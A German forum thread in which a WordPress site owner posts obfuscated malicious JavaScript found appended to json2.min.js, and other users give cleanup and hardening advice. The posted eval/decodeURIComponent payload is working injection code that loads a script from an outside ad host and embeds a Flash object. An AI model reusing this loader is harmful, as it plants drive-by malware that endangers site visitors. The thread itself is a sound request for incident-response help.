kostenloser Webspace werbefrei: lima-city

Malware auf Wordpress Webseite

lima-cityForumProgrammiersprachenPHP, MySQL & .htaccess

abonnieren beste wahl code date datei datenbank desinfektion ersten blick folgendes gefunden code ftp gefahr installation manager schaden sog spur suche url ursache version
  1. Autor dieses Themas

    ellogro2009

    Kostenloser Webspace von ellogro2009

    ellogro2009 hat kostenlosen Webspace.

    18:08, 27.12.2014
    Hallo,
    Ich habe auf 2 meiner Webseiten (beides Wordpress Installationen) eine Malware Meldung von Google erhalten.
    Ich habe mich sofort auf die Suche gemacht und habe folgendes gefunden:

    eval(decodeURIComponent('%0D%0A%76%61%72%20%5F%5F%5F%73%63%73%63%73%63%20%3D%20%6E%75%6C%6C%3B%0D%0A%76%61%72%20%5F%5F%5F%65%6D%65%6D%65%6D%20%3D%20%6E%75%6C%6C%3B%0D%0A%0D%0A%0D%0A%76%61%72%20%55%55%5F%44%79%6E%53%63%72%20%3D%20%66%75%6E%63%74%69%6F%6E%28%70%53%72%63%29%0D%0A%7B%0D%0A%09%76%61%72%20%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%73%63%72%69%70%74%22%29%3B%20%73%2E%74%79%70%65%20%3D%20%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3B%20%73%2E%73%72%63%20%3D%20%70%53%72%63%3B%20%64%6F%63%75%6D%65%6E%74%2E%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%29%3B%20%72%65%74%75%72%6E%20%73%3B%0D%0A%7D%0D%0A%0D%0A%76%61%72%20%55%55%5F%53%69%6E%6B%53%68%69%74%20%3D%20%66%75%6E%63%74%69%6F%6E%28%70%50%65%74%75%73%68%6F%6B%29%0D%0A%7B%0D%0A%09%5F%5F%5F%73%63%73%63%73%63%20%3D%20%55%55%5F%44%79%6E%53%63%72%28%27%68%74%74%70%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%73%77%66%6F%62%6A%65%63%74%2F%32%2E%32%2F%73%77%66%6F%62%6A%65%63%74%5F%73%72%63%2E%6A%73%27%29%3B%0D%0A%09%0D%0A%09%5F%5F%5F%73%63%73%63%73%63%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%09%7B%0D%0A%09%09%69%66%20%28%20%21%5F%5F%5F%65%6D%65%6D%65%6D%20%29%0D%0A%09%09%7B%0D%0A%09%09%09%5F%5F%5F%65%6D%65%6D%65%6D%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%64%69%76%27%29%3B%0D%0A%09%09%09%5F%5F%5F%65%6D%65%6D%65%6D%2E%69%64%20%3D%20%27%66%72%66%72%66%72%5F%73%68%69%74%27%3B%0D%0A%09%09%09%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%5F%5F%5F%65%6D%65%6D%65%6D%29%3B%0D%0A%09%09%09%0D%0A%09%09%09%76%61%72%20%66%76%20%3D%20%7B%20%64%61%6C%69%6E%6B%3A%20%70%50%65%74%75%73%68%6F%6B%7D%3B%0D%0A%09%09%09%73%77%66%6F%62%6A%65%63%74%2E%65%6D%62%65%64%53%57%46%28%27%2E%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66%27%2C%20%22%66%72%66%72%66%72%5F%73%68%69%74%22%2C%20%22%31%36%22%2C%20%22%31%36%22%2C%20%22%39%2E%30%2E%30%22%2C%20%66%61%6C%73%65%2C%20%66%76%29%3B%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%7D%0D%0A%0D%0A%2F%2F%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%0D%0A%0D%0A%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%0D%0A%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%0D%0A%73%63%72%69%70%74%2E%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%0D%0A%73%63%72%69%70%74%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%61%64%73%2E%61%6B%65%65%6D%64%6F%6D%2E%63%6F%6D%2F%64%62%32%36%27%3B%0D%0A%73%63%72%69%70%74%2E%69%64%3D%27%79%6F%79%6F%79%6F%5F%73%68%69%74%27%3B%0D%0A%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A'));



    Was bewirkt dieser Code? Welchen Schaden richtet er an? Wie verhindere ich das in Zukunft?


    Freundliche Grüsse
    ellogro2009

  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. fatfreddy

    Kostenloser Webspace von fatfreddy

    fatfreddy hat kostenlosen Webspace.

    18:57, 27.12.2014
    Auf den ersten Blick sieht es so aus, daß dieser Code ein zusätzliches DIV auf deiner Seite einrichtet und dort Code von einer fremden Seite platziert.
    Um zu beurteilen, welchen Schaden er anrichtet, müßte man genauer schauen. Fakt ist, das gehört nicht auf die Seite und sollte schleunigst beseitigt werden.


    Wo hast Du diesen Code gefunden?
    Benutzt Du eine aktuelle Version von Wordpress?
    Sind die Plugins alle aktuell?
    Kommt das verwendete Template aus einer zuverlässigen Quelle?

    Maßnahmen:

    a) Die Seite vom Netz nehmen. Nicht löschen! Beste Wahl wäre, den Homeordner umzubenennen.
    b) Passwörter von FTP und Datenbank ändern
    c) Backup von Datenbank und Webspace anlegen
    d) Suche nach Ursachen
    e) Desinfektion der Installation

  4. c22

    c22 hat kostenlosen Webspace.

    19:39, 27.12.2014
    Bei Wordpress war ja wie bei Drupal eine gravierende Sicherheitslücke gefunden worden, bei WP betrifft es alle Versionen von 3.0 - 3.9.2.. d.H. wenn man nicht regelmässig seine Installation updatet läuft man relativ einfach Gefahr so kompromittiert zu werden.

    https://wordpress.org/news/2014/11/wordpress-4-0-1/

    Beitrag zuletzt geändert: 27.12.2014 19:40:23 von c22
  5. Autor dieses Themas

    ellogro2009

    Kostenloser Webspace von ellogro2009

    ellogro2009 hat kostenlosen Webspace.

    23:07, 27.12.2014
    Bei beiden Seiten handelt es sich um Wordpress 3.9.x die ich sofort geupdatet habe ohne genau auf die Version zu schauen. Beim Template handelt es sich um ein Original von Wordpress (Twenty Twelve 1.5) dies habe ich eben gleich auf 1.6 aktualisiert.

    Der Schadcode befand sich unter httpdocs/wp-includes/js/json2.min.js am Ende der Datei (https://www.dropbox.com/s/pmg0666ilh32zkw/Screenshot%202014-12-27%2019.49.19.png?dl=0)

    Plugins:
    https://www.dropbox.com/s/i695ea1l3t4nnrg/Screenshot%202014-12-27%2019.44.15.png?dl=0

    Bei der anderen Seite selbes Schadensbild jedoch etwas andere Plugins, ich gehe jedoch von der selben Methode aus.
    Wie wird dieser Code im­ple­men­tie­rt? Durch falsche Dateiberechtigung oder via FTP?

    Freundliche Grüsse
    ellogro2009

  6. webdesignerin

    Kostenloser Webspace von webdesignerin

    webdesignerin hat kostenlosen Webspace.

    16:05, 28.12.2014
    Hallo ellogro2009, :wave:

    solche Skripte stammen meistens von unsauberen Plugins, sog. "nulled scripts". In diesem Fall scheint es sich aber um eine bekannte Sicherheitslücke des Plugins "Download Manager" zu handeln.

    Siehe: WordPress Security: Serious Vulnerability in WordPress Download Manager

    Ich kann Dir nur raten Wordfence zu installieren und zu nutzen, denn es warn Dich vor dubiosen Änderungen an Dateien und sagt Dir auch was genau geändert wurde. So kommst Du zukünftig Schadcode schneller und leichter auf die Spur. Ach und den Newsletter von Wordfence würde ich auch gleich abonnieren - es lohnt sich up to date zu sein! :wink:


    Gruß,
    webdesignerin :angel:

  7. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

lima-city bietet dir kostenlosen und werbefreien Speicherplatz für Deine Homepage. Sofort anmelden und direkt loslegen mit Webspace, PHP, Datenbanken, günstigen Domains und einer tollen Community!

Login zum Webhosting ohne Werbung!

Hast Du schon kostenlosen Webspace oder bist Du auf der Suche nach WordPress-Hosting mit Staging-Funktion und wp-cli? Jetzt günstige Prepaid Domains registrieren!